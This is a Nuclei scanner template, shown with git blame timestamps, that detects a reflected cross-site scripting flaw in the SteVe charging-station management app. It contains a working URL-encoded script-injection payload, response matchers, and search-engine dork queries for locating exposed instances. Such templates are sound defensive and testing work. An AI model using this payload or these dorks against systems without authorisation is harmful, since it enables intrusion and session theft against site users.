nuclei-templates/http/vulnerabilities/other/steve-xss.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

2022-10-26 16:59:39 +00:00
id: steve-xss
2022-10-26 16:09:38 +00:00
info:
2022-10-26 16:59:39 +00:00
name: SteVe - Cross-Site Scripting
2022-10-26 16:09:38 +00:00
author: clem9669
severity: medium
2022-10-26 16:59:39 +00:00
description: |
SteVe contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-10-26 16:09:38 +00:00
reference:
- https://github.com/steve-community/steve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
2022-10-26 16:09:38 +00:00
metadata:
2022-10-26 16:59:39 +00:00
verified: true
2022-10-26 16:09:38 +00:00
shodan-query: http.title:"SteVe - Steckdosenverwaltung"
google-query: intitle:"SteVe - Steckdosenverwaltung"
2022-10-28 14:14:06 +00:00
tags: steve,xss,oss
2022-10-26 16:09:38 +00:00
http:
2022-10-26 16:09:38 +00:00
- method: GET
path:
- '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
- '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
2022-10-26 16:59:39 +00:00
2022-10-26 16:09:38 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
2022-10-26 16:59:39 +00:00
part: body
2022-10-26 16:09:38 +00:00
words:
2022-10-26 16:59:39 +00:00
- '<script>alert(document.domain)</script>/services/?stylesheet=1">'
2022-10-26 16:09:38 +00:00
- type: word
2022-10-26 16:59:39 +00:00
part: header
2022-10-26 16:09:38 +00:00
words:
- "text/html"
2022-10-26 16:59:39 +00:00
- type: status
status:
- 200
# Enhanced by md on 2022/12/13